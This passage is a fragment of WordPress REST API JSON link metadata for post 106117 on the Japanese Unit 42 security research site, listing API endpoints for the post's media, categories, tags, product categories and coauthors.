tps:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=106117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=106117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=106117"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=106117"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=106117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}